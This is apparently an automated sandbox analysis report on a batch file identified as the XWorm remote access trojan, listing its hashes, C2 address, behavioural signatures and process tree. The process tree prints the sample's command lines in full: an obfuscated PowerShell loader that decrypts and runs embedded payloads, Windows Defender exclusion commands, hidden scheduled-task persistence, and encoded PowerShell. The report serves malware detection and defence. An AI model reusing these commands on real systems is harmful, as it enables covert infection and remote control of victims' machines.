Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/09/2024, 08:24

General

  • Target

    Image logger V2.bat

  • Size

    29.9MB

  • MD5

    f9fe001633e62b59eec398eaeb5d9b3c

  • SHA1

    edc9879fab5c9e69eca9814584a3079e93a4339d

  • SHA256

    2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef

  • SHA512

    0bebd885894e67d2490c55f9d07f7bdaf2e1c5aea1632739fb41b7a05fb6e2a997948dd22f6d1e5b4b1233a40d76ae326acd8d0ad1d54b0ae7c0d55be4da8a20

  • SSDEEP

    49152:4JDhbOqBRZaVCQdy5U5CTCxA2HRHt21676CpcIZPxlwmCQ2VjDnMl/6xXh7r9EGV:47

Malware Config

Extracted

Family

xworm

C2

since-searching.gl.at.ply.gg:64197

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Helper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 32 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4140
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_430_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_430.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2120
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_430.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_430.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:4904
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_430.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_430.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3768
                • C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
                  "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2412
                  • C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
                    "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3888
                • C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe
                  "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • Suspicious use of WriteProcessMemory
                  PID:4112
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WebhookSpammerV5.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2724
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4464
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WebhookSpammerV5.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4372
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "WebhookSpammerV5" /tr "C:\ProgramData\WebhookSpammerV5.exe"
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1132
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdgBlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAagBzACMAPgA="
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4536
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQByACMAPgA="
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4804
                  • C:\Windows\Latite_Client_betterV1.exe
                    "C:\Windows\Latite_Client_betterV1.exe"
                    7⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:4532
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite_Client_betterV1.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3972
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Latite_Client_betterV1.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1520
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite_Client_betterV1.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1428
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite_Client_betterV1" /tr "C:\ProgramData\Latite_Client_betterV1.exe"
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:3484
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        9⤵
                          PID:1656
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdABzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByACAAbgBvAHQAIAB3AG8AcgBrAGkAbgBnACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB6AHkAdAAjAD4A"
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4992
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAeQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBmACMAPgA="
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2280
                      • C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe
                        "C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe"
                        8⤵
                        • Checks computer location settings
                        • Drops startup file
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        • Suspicious use of SetWindowsHookEx
                        PID:1296
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4776
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            10⤵
                              PID:5076
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3064
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3204
                          • C:\Windows\System32\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite Client_BetterV3" /tr "C:\ProgramData\Latite Client_BetterV3.exe"
                            9⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:3252
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2912
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4796
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:3692
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4912
                          • C:\Windows\System32\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
                            9⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:4120
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.21 64197 7777 4BC88332F36C4890A41E
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:664
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
                              10⤵
                              • System Location Discovery: System Language Discovery
                              PID:4244
                              • C:\Windows\SysWOW64\explorer.exe
                                "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
                                11⤵
                                • System Location Discovery: System Language Discovery
                                PID:3976
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
                              10⤵
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:1672
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
                                11⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                PID:4860
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2128 /prefetch:2
                                11⤵
                                  PID:3540
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2292 /prefetch:3
                                  11⤵
                                    PID:2260
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2596 /prefetch:8
                                    11⤵
                                      PID:3052
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
                                      11⤵
                                        PID:716
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                                        11⤵
                                          PID:1972
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
                                          11⤵
                                            PID:4748
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                                            11⤵
                                              PID:376
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4860 /prefetch:8
                                              11⤵
                                                PID:2088
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4860 /prefetch:8
                                                11⤵
                                                  PID:2808
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
                                                  11⤵
                                                    PID:4904
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                                                    11⤵
                                                      PID:3108
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
                                                      11⤵
                                                        PID:4028
